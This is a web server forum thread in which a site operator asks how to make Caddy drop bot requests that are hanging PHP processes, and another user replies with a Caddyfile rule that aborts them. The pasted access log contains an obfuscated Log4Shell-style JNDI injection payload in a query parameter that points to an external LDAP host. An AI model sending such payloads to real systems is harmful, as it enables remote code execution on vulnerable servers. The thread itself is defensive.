How to drop hacking URLs?

MattVCA · June 20, 2023, 3:30pm

1. The problem I’m having:

We are being spammed by bots looking for vulnerabilities, but unfortunately this is creating PHP processes that remain in a “Getting Connection Information” state and hang. This then rapidly fills the available PHP processes and the whole lot just stops responding to web requests because none of the processes ever complete.

We can see that the main identifier is that a URL is hit with a massive URL parameter starting with something like ?cx=$7B…

Is there a method to just have Caddy drop anything that looks like that?

2. Error messages and/or full log output:

{"level":"info","ts":1687268912.911088,"logger":"http.log.access.log5","msg":"handled request","request":{"remote_ip":"146.70.45.221","remote_port":"25734","proto":"HTTP/1.1","method":"GET","host":"scotland.redacted.com","uri":"/discover/food-drink?cx=$%7B$%7B:-j%7D$%7B:-n%7D$%7B:-d%7D$%7B:-i%7D:$%7B:-l%7D$%7B:-d%7D$%7B:-a%7D$%7B:-p%7D://143.198.244.73:80/dn=gAAAAABkka4tkNra3aYQj1voDBSasZUdPlP6laGl9fXtWj-3x1wwJkzOzdjX8LOeLLxIr6DLHtL8uIK9brYy6mlxkoS8RB_DLoySmeQSWu2Uvfxdey5KIB5bYbSJ2SNAPfr9ofAH8aSQ5FSI-kH-8ypmUTn0AU2M0l8aU0FpZtGbNpli8f_m2HevItxT9RBZBdUGBD7RfQ4SgkAq-DEgt1HFlhTHuxDH9LTQXSf5zXXmYXKJpC0c_akouddu131kV-kyBjU_XoS8KORKPpFmHmc4uFiUvx69dqOAjKPsrdueZFYKe6HgshQbGpwIC0yckqMW1fKlgzZ6kkWoM3xJXVQLXghxd5gvUUGa7kgZmrV5T6q8Tn3psbzoB6dF5pGzs8V6bPuofNuvn_Z6fpQCs9kIidBVxdJIzMhvBZAG1MfjCguwHAThKHuZDjjaw7DPrtqnW1j1VR6C2K47jK-mISxaGTAFIUh1gY_c1Gk2aCCfNk4nOE22PiL2FrnCF9IdCmaLDu3DJbeKvK4kmg6engx1OOrg9_bzl0xGjtAAhnJDGFl3TppwV9pK8agggQnAD6yhJfjlQd-rNZMSSrx_LDZg4nweV82XTj3O2I2jYaGCDA8plsnbzZH1bKk7JhkLneFxww1sThNHoEKVeb9tNaonahkegQK02r5gbgA6JUrQjVpfI1HgaXhRiCy6Sadm4dhJYw-ZXvCEYJTLrv9kloelNdftwdLu5qSXb1IC5HqMaEmKUVFJ47XaeZsd9xS1byGzmk2X3h1VMb0A-gyhQQXF3u3h52DkcLBEPqOR3qmKBJII9Lqwpruwg0qqFh-mYR6XDtSGMsS5v_C5B-wYijeWCiQyaIX5ND5Q18OiNDExskkrmxJl-WMO4SNcBS2C6yYsEMukEbpzhCmC0LcRVTHCc2uAoeYSEPhITMWb4Y01SvkhWAsHqEoXXHaHRAExcmtX1I5Hf8NJapJKmw5wFXIu0c5Gqs0FcHgwNtOIucmRIzrfgoEC3FOZlAbuUEGUxWMWODPpxDdXLzrPV5ZW2mxwRrGyGsWZbBBuIYCg0coXqJMMZzLWzT3b0vxLPSsDjVISbBZH19cbnzCtHqBT6p6bI9GEBTyX5sLomjC9Os_RSfXwoxKinFJyK0OJ2kerD1CK80qR98tIqkYAJKwx3hicjUhOt4G95JXBoBT6-rrxTX2iIb7v9SwLRL51lSUhi30zHGR55We_Y-NEOWIutNH5WJ-anv5jCK-jkPLrcPhgLVYvcx7FIdDtmqabKaSFk_LHEFDH0yZUFmWHcJuhoossVMaTPa3901zmbZGbg6MJDd6IdqPAthk9Sg0CQ0OR_QXms984kxOv3mApLd4jk4efdcg4u7wGdq9ydk5ws0eGz9NiTWEEpe4-np8BZVnqm8GiKf3NbZmRuqcjxmeuhwT0tvNlB2nIcULdWLBS34raHKoXB7mDz3txtmmUsAt6J2BMLBJhNpj0Y2Hzt4uoNo5BuwVnPQ4J7mjumhgs21A8t0KzJpzph1h4-sJMC5Yk2iwOwaa6uzITNGaG2qFKesxnq7VAlAfhULbm0HmQESjEsJC1Xx9fk9T89HWehWQWZNTNytQosoAL%7D","headers":{"User-Agent":["python-requests/2.31.0"],"Accept-Encoding":["gzip, deflate"],"Accept":["*/*"],"Connection":["keep-alive"]},"tls":{"resumed":false,"version":772,"cipher_suite":4865,"proto":"http/1.1","server_name":"scotland.redacted.com"}},"user_id":"","duration":2.103405375,"size":10138,"status":200,"resp_headers":{"Set-Cookie":[],"Pragma":["no-cache"],"X-Robots-Tag":["all"],"Server":["Caddy"],"Alt-Svc":["h3=\":443\"; ma=2592000"],"Expires":["Thu, 19 Nov 1981 08:52:00 GMT"],"Cache-Control":["no-store, no-cache, must-revalidate"],"Content-Type":["text/html; charset=UTF-8"],"Referrer-Policy":["no-referrer-when-downgrade"],"Content-Encoding":["gzip"],"Vary":["Accept-Encoding"],"Link":["<https://scotland.redacted.com/discover/food-drink>; rel='canonical'"],"X-Powered-By":["Craft CMS"]}}

3. Caddy version:

v2.6.4 h1:2hwYqiRwk1tf3VruhMpLcYTg+11fCdr8S3jhNAdnPy8=

4. How I installed and ran Caddy:

n/a

a. System environment:

Ubuntu 22.04 LTS

b. Command:

n/a

c. Service/unit/compose file:

n/a

d. My complete Caddy config:

redacted.com,
scotland.redacted.com,
north.redacted.com,
south.redacted.com {
        root * /websites/redacted/web
        encode gzip zstd

        log {
                output file /websites/_logs/redacted.log
        }

        php_fastcgi unix//run/php/php8.1-fpm.sock

        file_server
}

5. Links to relevant resources:

matt · June 20, 2023, 5:44pm

If ?cx=... is the marker, then I would just do:

@bad query cx=*
abort @bad

You could also customize timeouts: Global options (Caddyfile) — Caddy Documentation

There’s already an idle timeout, so if the connections aren’t being dropped then they’re not actually hanging, they’re just draining or dripping slowly. You can enable some of the other timeouts there to see if that helps.

MattVCA · June 20, 2023, 6:23pm

Thanks Matt, trying that now.

system · July 20, 2023, 6:24pm

This topic was automatically closed 30 days after the last reply. New replies are no longer allowed.